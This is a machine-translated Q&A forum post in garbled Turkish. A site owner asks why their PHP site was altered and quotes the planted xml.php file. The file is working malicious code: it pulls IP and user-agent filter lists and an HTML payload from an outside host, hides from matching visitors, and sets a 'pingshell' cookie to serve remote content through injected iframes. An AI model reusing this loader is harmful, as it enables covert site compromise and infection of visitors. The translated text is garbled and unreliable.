Ben sadece hacklendi, ama nasıl ya da daha da önemlisi, neden bilmiyorum.

0 Cevap php

EDIT: tüm şimdiye kadar iyi iş.

Ben sadece bu varlık karşıdan bulundu ve benim bash tarihinin koştu ettik:

http://notsoft.ru/glib

(Görünümüne güvenli)

Tüm teşekkürler

Ben sadece benim sitenin kaynak php düzenlendi fark ettik. (Ben beri tüm şifreleri değiştirdik) nasıl hiçbir fikrim yok ama ne gerçekten beni neden karıştırır.

Sayfaların bir çift yerleştirilmiş bir iframe benim images dizininin (HTACCESS tarafından erişilebilir tek dizin yerleştirildi bir xml.php dosyasına bağlantı vardı. Sayfaları oldukça karmaşık ve oto yerde olduğu gibi bu kod el konulmuştur ZORUNLU fren olmadan bu sayfalar yakın imkansız olurdu.

Şimdi REALLY kafa karıştırıcı şey hiçbir şey yapmaz ne görebilirsiniz itibaren, bu XML.php dosyanın içeriğini olduğunu.

İşte kod:

<?php

$urlIps = "http://mp3magicmag.com/frame/ips.txt"; // Url to IP's
$urlHtml = "http://mp3magicmag.com/frame/html.code"; // Url to html.code
$urlUa = "http://mp3magicmag.com/frame/ua.txt"; // Url to User Agent file

if(isset($_GET['ping'])){
    echo "Status: Ping successful!"; die;
}
$ip = $_SERVER['REMOTE_ADDR'];
//orezaem do deapozona
$exIps = explode(".", $ip);

$ip = $exIps[0].".".$exIps[1].".".$exIps[2];

$ips = file_get_contents($urlIps);

if(strpos(" ".$ips, $ip)){ // esli nashli IP v file to ostanavlivaem process..
    die;
}

$arrUa = file($urlUa);
for($ua=0; $ua<count($arrUa); $ua++){
    $userAgent = trim($arrUa[$ua]);
    if(strpos(" ".$_SERVER['HTTP_USER_AGENT'], $userAgent)){ // esli nashli v User Agent'e to ostanavlivaem process..
        die;
    }
}


if(isset($_COOKIE['pingshell'])){ // proveriaem est' li kuki

    echo @file_get_contents($urlHtml);

}else{

?>
<SCRIPT LANGUAGE="JavaScript">
function setCookie (name, value, expires, path, domain, secure) {
      document.cookie = name + "=" + escape(value) +
    ((expires) ? "; expires=" + expires : "") +
    ((path) ? "; path=" + path : "") +
    ((domain) ? "; domain=" + domain : "") +
    ((secure) ? "; secure" : "");
}
</SCRIPT>

<SCRIPT LANGUAGE="JavaScript">
setCookie("pingshell", "12345", "Mon, 01-Jan-2099 00:00:00 GMT", "/");
</SCRIPT>
<meta http-equiv="refresh" content="2; url=">

<?php
}
?>

Ben bir şey eksik, ya bu tuhaf hiç "hack" dir muyum? Ben araştırmamı yaptım ve daha önce oluyor buna herhangi bir başvuru bulamıyor.

0 Cevap

etiketler